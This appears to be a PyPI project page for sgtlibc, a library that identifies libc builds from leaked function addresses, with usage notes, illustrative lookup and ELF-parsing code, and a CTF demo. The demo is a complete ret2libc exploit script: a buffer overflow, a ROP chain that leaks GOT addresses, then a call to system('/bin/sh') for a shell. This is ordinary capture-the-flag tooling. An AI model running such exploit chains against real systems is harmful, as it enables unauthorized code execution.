
An offline Python library for identifying a libc build from leaked function addresses and looking up its symbol offsets. From a shell: `sgtlibc puts:aa0+read:140 --dump system binsh`; from Python: `import sgtlibc; s = sgtlibc.LibcSearcher(); s.add_condition('puts', 0xaa0)`.

Project description


Supported platforms: Windows, Linux (Ubuntu, Kali, Deepin, Debian, CentOS), FreeBSD

What?

sgtlibc is an offline Python library for identifying a libc build from leaked function addresses and looking up its symbol offsets. The lookup works the same way as libc-database: ASLR moves libc by whole pages, so the low 12 bits of a leaked address are fixed by the build and can be matched against a table of known symbol offsets.

Install

pip install sgtlibc

Usage

usage: sgtlibc [-h] [-d [DUMP ...]] [-i [INDEX]] [-s [SYMBOLS]] [-u [UPDATE]] [-v [VERSION]] [funcs_with_addresses]

An offline Python library for identifying a libc build from leaked function addresses. From a shell: `sgtlibc puts:aa0+read:140 --dump system binsh`; from Python: `import sgtlibc; s = sgtlibc.LibcSearcher(); s.add_condition('puts', 0xaa0)`.

positional arguments:
  funcs_with_addresses  `func-name:address` pairs, address in hex without the 0x prefix, joined with `+`, e.g. puts:aa0+read:140, meaning puts is at 0xaa0 and read is at 0x140 (default: None). The original help text says the pairs are split by `|`, but every example on this page uses `+`, and an unquoted `|` would be taken by the shell as a pipe.

options:
  -h, --help            show this help message and exit
  -d [DUMP ...], --dump [DUMP ...]
                        symbols to dump from the matched libc (default: ['__libc_start_main_ret', 'system', 'dup2', 'read', 'write', 'str_bin_sh']). The examples on this page write `binsh` for `str_bin_sh`.
  -i [INDEX], --index [INDEX]
                        which entry to use when more than one libc build matches the given addresses (default: 0).
  -s [SYMBOLS], --symbols [SYMBOLS]
                        convert a libc ELF file into a symbols file; pass `libc_path [alias]` (the "add user-libc database" section below uses the `path:alias` form).
  -u [UPDATE], --update [UPDATE]
                        update the bundled libc database from the internet; requires a non-Windows environment (default: False).
  -v [VERSION], --version [VERSION]
                        show version

Quick Start

  • in cmd.exe or /bin/sh
sgtlibc puts:aa0                                # one leaked address: usually several builds match
sgtlibc puts:aa0+read:140                       # a second address narrows the match
sgtlibc puts:aa0+read:140 --dump system binsh   # print the offsets needed for ret2libc
  • in python3
import sgtlibc
s = sgtlibc.Searcher()
s.add_condition('puts', 0xaa0)    # leaked address; the search keys on its low 12 bits
s.add_condition('read', 0x140)
print(s.dump())                   # default symbol set, see --dump
print(s.dump(['system', 'str_bin_sh']))

Example

  • the positional argument is a list of `func-name:address` pairs, address in hex without 0x, joined with `+` (the --help text says `|`, but the examples use `+`)

    eg: puts:aa0+read:140 which means:

    • func-puts address = 0xaa0
    • func-read address = 0x140

    Only the low 12 bits of each address take part in the match, because ASLR shifts libc by whole pages; passing the full leaked value (e.g. 0xf71234567aa0, as in the pwntools example below) gives the same match.
  • --update refreshes the libc database from the internet, using libc-database as the source; it requires a non-Windows system
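As an added example (my own illustration code, not sgtlibc's implementation), here is the matching logic such a search performs, written against a constructed three-entry database with invented offsets: parse the `name:hexaddr+...` argument, compare the low 12 bits of each leak against every build, then derive the libc base from full leaks and compute absolute `system`/`str_bin_sh` addresses. The second and third entries deliberately share the page offsets of `puts` and `read`, which is the multi-match case that `--index`/`db_index` exists for; `resolve()` also rejects a chosen build whose offsets do not agree with every leak, which catches a wrong pick that passed the 12-bit test by coincidence.

```python
"""Libc-database style lookup from leaked addresses (added example, not sgtlibc's code)."""
from typing import Dict, List

# Constructed sample database: build name -> {symbol: offset}. Offsets are invented
# for this example; a real table comes from each libc's .dynsym. Entries 2 and 3
# share the low 12 bits of puts/read on purpose to show an ambiguous match.
FAKE_DB: Dict[str, Dict[str, int]] = {
    "libc6_2.31-0ubuntu9_amd64": {
        "puts": 0x84420, "read": 0x111130, "write": 0x1111D0, "system": 0x52290,
        "str_bin_sh": 0x1B45BD, "__libc_start_main_ret": 0x240B3,
    },
    "libc6_2.27-3ubuntu1_amd64": {
        "puts": 0x80AA0, "read": 0x110140, "write": 0x1101D0, "system": 0x4F440,
        "str_bin_sh": 0x1B3E9A, "__libc_start_main_ret": 0x21B97,
    },
    "libc6_2.27-3ubuntu1.4_amd64": {
        "puts": 0x80AA0, "read": 0x110140, "write": 0x1101D0, "system": 0x4F550,
        "str_bin_sh": 0x1B3E1A, "__libc_start_main_ret": 0x21BF7,
    },
}
PAGE_MASK = 0xFFF                    # ASLR slides libc by whole 4 KiB pages
ALIASES = {"binsh": "str_bin_sh"}    # short name used on the command line


def parse_conditions(spec: str) -> Dict[str, int]:
    """Parse 'puts:aa0+read:140' (hex without 0x) into {symbol: address}."""
    conds: Dict[str, int] = {}
    for item in spec.split("+"):
        name, sep, addr = item.partition(":")
        if not sep or not name or not addr:
            raise ValueError(f"bad condition {item!r}: expected name:hexaddr")
        conds[name.strip()] = int(addr, 16)
    return conds


def search(db: Dict[str, Dict[str, int]], conds: Dict[str, int]) -> List[str]:
    """Builds whose symbol page offsets agree with every leaked address."""
    return [
        build for build, syms in db.items()
        if all(sym in syms and ((syms[sym] ^ addr) & PAGE_MASK) == 0
               for sym, addr in conds.items())
    ]


def resolve(db: Dict[str, Dict[str, int]], build: str,
            leaks: Dict[str, int], wanted: List[str]) -> Dict[str, int]:
    """Derive the libc base from full leaked addresses, then absolute addresses of wanted symbols.

    Every leak must imply the same base; if they disagree, the chosen build is wrong
    even though its low 12 bits happened to match."""
    syms = db[build]
    bases = {leaked - syms[sym] for sym, leaked in leaks.items()}
    if len(bases) != 1:
        raise ValueError(f"leaks disagree on the base for {build}: {[hex(b) for b in bases]}")
    base = bases.pop()
    if base & PAGE_MASK:
        raise ValueError(f"base {base:#x} is not page aligned; leak or table is wrong")
    canon = [ALIASES.get(name, name) for name in wanted]
    return {name: base + syms[name] for name in canon}


def demo():
    """Constructed walkthrough: ambiguous match, disambiguation, then address resolution."""
    hits = search(FAKE_DB, parse_conditions("puts:aa0+read:140"))          # two builds
    conds = parse_conditions("puts:aa0+read:140+__libc_start_main_ret:b97")
    hits2 = search(FAKE_DB, conds)                                          # one build
    # Full leaks as a pwntools script would collect them (constructed values).
    leaks = {"puts": 0x7F3E1C480AA0, "read": 0x7F3E1C510140}
    addrs = resolve(FAKE_DB, hits2[0], leaks, ["system", "binsh"])
    return hits, hits2, addrs


if __name__ == "__main__":
    hits, hits2, addrs = demo()
    print("ambiguous:", hits)
    print("disambiguated:", hits2)
    print({name: hex(addr) for name, addr in addrs.items()})
```

When a real search returns more than one build, add another leak (`__libc_start_main_ret`, `write`, or any function you can read from the GOT) before trusting an index; the base-consistency check in `resolve()` is cheap insurance once you have two full leaks.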

python run

  • run the Python code from Quick Start above; you get output like the following:

[image: image-20220605212842313]

command run

  • run the command in a terminal; you get output like the following:

[image: image-20220605213023151]

pwntools run

  • use in pwntools
from pwn import *   # pip install pwntools first
import sgtlibc
s = sgtlibc.Searcher()
puts_addr = 0xf71234567aa0          # address leaked from the target, e.g. by printing puts@got
s.add_condition('puts', puts_addr)
s.dump(db_index=0)                  # search the database; with several matching builds, index 0 is used unless you pick another
# p64 packs the absolute address for the payload (p00 from sgtlibc.gamebox has the same effect, see the CTF demo below)
system_addr = p64(s.get_address(sgtlibc.s_system))
binsh_addr = p64(s.get_address(sgtlibc.s_binsh))

use user-libc database

search libc from user-directory

from sgtlibc import LibcSearcher                 # the searcher class used in the project description
from sgtlibc.utils import configuration as config

def test_use_user_libc():
    lib_path = './libs'                          # directory holding your own libc .so files
    config.set(config.extension_database_path, lib_path)
    s = LibcSearcher('puts', 0xf7007)            # leaked puts address
    s.decided()

add user-libc database

add a libc .so file to the database

sgtlibc -s ./libc.from_user.so:alias_input_here

or

from sgtlibc.main import do_symbols
do_symbols('./libc.from_user.so:alias_input_here')   # same `path:alias` form as the command line
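Turning a libc you found yourself into symbol offsets, as the `-s`/`do_symbols` step does, is plain ELF parsing. The following is an added example (my own code, not sgtlibc's converter, and not its on-disk format): read `.dynsym`/`.dynstr` with the struct module to get the offset of every defined symbol, and record the file offset of the `/bin/sh` string under the libc-database name `str_bin_sh`. `build_fake_libc()` is a constructed fixture so the block runs with no libc on disk; on a real system pass a path such as `/lib/x86_64-linux-gnu/libc.so.6` (an assumed path).

```python
"""Extract symbol offsets from a libc ELF64 (added example, not sgtlibc's code)."""
import struct
import sys
from typing import Dict

ELF_HEADER = "<16sHHIQQQIHHHHHH"   # Elf64_Ehdr, 64 bytes, little-endian
SECTION_HEADER = "<IIQQQQIIQQ"     # Elf64_Shdr, 64 bytes
SYMBOL = "<IBBHQQ"                 # Elf64_Sym, 24 bytes
SHT_STRTAB, SHT_DYNSYM, SHN_UNDEF = 3, 11, 0


def _cstr(table: bytes, off: int) -> str:
    """NUL-terminated string at offset off of a string table."""
    return table[off:table.index(b"\0", off)].decode()


def libc_symbols(data: bytes) -> Dict[str, int]:
    """Offset of every defined dynamic symbol, plus str_bin_sh like libc-database."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 file")
    ehdr = struct.unpack_from(ELF_HEADER, data, 0)
    shoff, shentsize, shnum = ehdr[6], ehdr[11], ehdr[12]
    sections = [struct.unpack_from(SECTION_HEADER, data, shoff + i * shentsize)
                for i in range(shnum)]
    dynsym = next((s for s in sections if s[1] == SHT_DYNSYM), None)
    if dynsym is None:
        raise ValueError("no .dynsym section; is this a static or stripped libc?")
    strtab = sections[dynsym[6]]                       # sh_link points at .dynstr
    strings = data[strtab[4]:strtab[4] + strtab[5]]   # sh_offset, sh_size
    entsize = dynsym[9] or struct.calcsize(SYMBOL)
    syms: Dict[str, int] = {}
    for i in range(dynsym[5] // entsize):
        st_name, _, _, st_shndx, st_value, _ = struct.unpack_from(
            SYMBOL, data, dynsym[4] + i * entsize)
        if st_shndx == SHN_UNDEF or st_value == 0:
            continue                                   # imported symbols carry no offset here
        syms.setdefault(_cstr(strings, st_name), st_value)   # keep the first of any duplicates
    pos = data.find(b"/bin/sh\0")
    if pos != -1:
        # glibc places this string in a read-only segment whose file offset equals its
        # virtual offset, so the raw file offset is what a ROP chain needs. For a libc
        # laid out differently, translate through the PT_LOAD program headers instead.
        syms["str_bin_sh"] = pos
    return syms


def symbols_text(syms: Dict[str, int]) -> str:
    """One 'name hexoffset' line per symbol (a simple text layout, not sgtlibc's own format)."""
    return "".join(f"{name} {off:x}\n" for name, off in sorted(syms.items()))


def build_fake_libc(symbols: Dict[str, int]) -> bytes:
    """Constructed minimal ELF64 with just .dynstr, .dynsym and a /bin/sh string (test fixture)."""
    dynstr, name_off = b"\0", {}
    for name in symbols:
        name_off[name] = len(dynstr)
        dynstr += name.encode() + b"\0"
    dynsym = bytes(24)                                 # mandatory null symbol
    for name, value in symbols.items():
        # st_info 0x12 = STB_GLOBAL | STT_FUNC; st_shndx 1 = any section other than SHN_UNDEF
        dynsym += struct.pack(SYMBOL, name_off[name], 0x12, 0, 1, value, 0)
    body = dynstr + dynsym + b"/bin/sh\0"
    off_dynstr, off_dynsym = 64, 64 + len(dynstr)
    shdrs = bytes(64)                                  # index 0 is the null section
    shdrs += struct.pack(SECTION_HEADER, 0, SHT_STRTAB, 0, 0, off_dynstr, len(dynstr), 0, 0, 1, 0)
    shdrs += struct.pack(SECTION_HEADER, 0, SHT_DYNSYM, 0, 0, off_dynsym, len(dynsym), 1, 1, 8, 24)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)          # ELF64, little-endian, version 1
    ehdr = struct.pack(ELF_HEADER, ident, 3, 0x3E, 1, 0, 0, 64 + len(body), 0, 64, 0, 0, 64, 3, 0)
    return ehdr + body + shdrs


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_fake_libc(
        {"puts": 0x80AA0, "read": 0x110140, "system": 0x4F440})
    print(symbols_text(libc_symbols(blob)), end="")
```

Compare the `puts`, `system` and `str_bin_sh` values this prints for a real libc against `readelf -Ws` and `strings -a -t x libc.so.6 | grep /bin/sh` before you trust a symbols file you built yourself; a wrong `str_bin_sh` offset is the usual reason a ret2libc chain lands in `system()` but gets no shell.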

CTF Problem Solve DEMO

view all sample files

  • use exploit code
import sgtlibc
from sgtlibc.gamebox import *   # provides set_config, GameBoxConfig, client, sl, rl, rc, uc, fakeebp, interactive, log
set_config(GameBoxConfig(
    is_local=True, file='./babyrop2', remote='192.168.0.1:25462',
    auto_load=True,
    auto_show_rop=True,
    auto_show_summary=True,
    auto_start_game=True,
    auto_load_shell_str=True,
    auto_show_symbols=True
))
s = sgtlibc.Searcher()
elf = client.elf

def exp():
    # fill the buffer up to the saved rbp, then overwrite rbp with a fake value
    payload_exp = [b'a' * (28 + 4), fakeebp()]   # overflow position
    return payload_exp

def leak(func: str):
    # ROP chain: pop rdi; ret -> func@got -> printf@plt -> main, so printf prints func's libc address
    payload = exp()
    # list items are auto-packed to p64; explicit p64 or p00 has the same effect
    payload += [elf.rop['rdi'], elf.got[func], elf.plt['printf'], elf.symbols['main']]
    sl(payload)
    rl()
    data = rc(6).ljust(8, b'\0')   # a user-space x86-64 address has 6 significant bytes
    data = uc(data)
    s.add_condition(func, data)    # feed the full leaked address to the searcher
    return data

leak('printf')
leak('read')
data = s.dump(db_index=2)   # pick the matching libc build; index 2 was the right one for this target
system_addr = s.get_address(sgtlibc.s_system)
binsh_addr = s.get_address(sgtlibc.s_binsh)
log.info(f'system_addr:{hex(system_addr)}')
log.info(f'binsh_addr:{hex(binsh_addr)}')
payload = exp()
# ret2libc: system("/bin/sh"); if system() crashes on a movaps, insert a ret gadget before it to realign the stack
payload += [elf.rop['rdi'], binsh_addr, system_addr, fakeebp()]
sl(payload)
interactive()
  • result

[image: image-20220609134743902]

Notice

The bundled libc database was last updated on 2022-06-01, which is long ago; refresh it with `sgtlibc --update` (non-Windows only, see above) before relying on a match, since a libc build that is missing from the database can never be identified.

Download files

Download the file for your platform.

Source Distribution

sgtlibc-1.16.0.tar.gz (20.8 MB view details)

Uploaded Source

Built Distribution

sgtlibc-1.16.0-py3-none-any.whl (21.5 MB view details)

Uploaded Python 3

File details

Details for the file sgtlibc-1.16.0.tar.gz.

File metadata

  • Download URL: sgtlibc-1.16.0.tar.gz
  • Upload date:
  • Size: 20.8 MB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.11.4

File hashes

Hashes for sgtlibc-1.16.0.tar.gz
Algorithm Hash digest
SHA256 e1d6e7add0915a71e08f690a64c3113e36c0ccdec26162ac4ad4e26161f133b5
MD5 4c82d1a4d0808616697c160443cbf302
BLAKE2b-256 f2baa379a21402c2c874f74bfbb193e7af50d7e5681897a8c66a57cd4349c32f


File details

Details for the file sgtlibc-1.16.0-py3-none-any.whl.

File metadata

  • Download URL: sgtlibc-1.16.0-py3-none-any.whl
  • Upload date:
  • Size: 21.5 MB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.2 CPython/3.11.4

File hashes

Hashes for sgtlibc-1.16.0-py3-none-any.whl
Algorithm Hash digest
SHA256 923bd978608d96995318b7071ba5798d091fb853dbb494e58ea4082c6f166610
MD5 f3c2bd826ae2bde51a8292acb8fd43e1
BLAKE2b-256 00504a6f2ff9448848bd785508c1e722b8ed587c1749a3ac1516781ff775078a

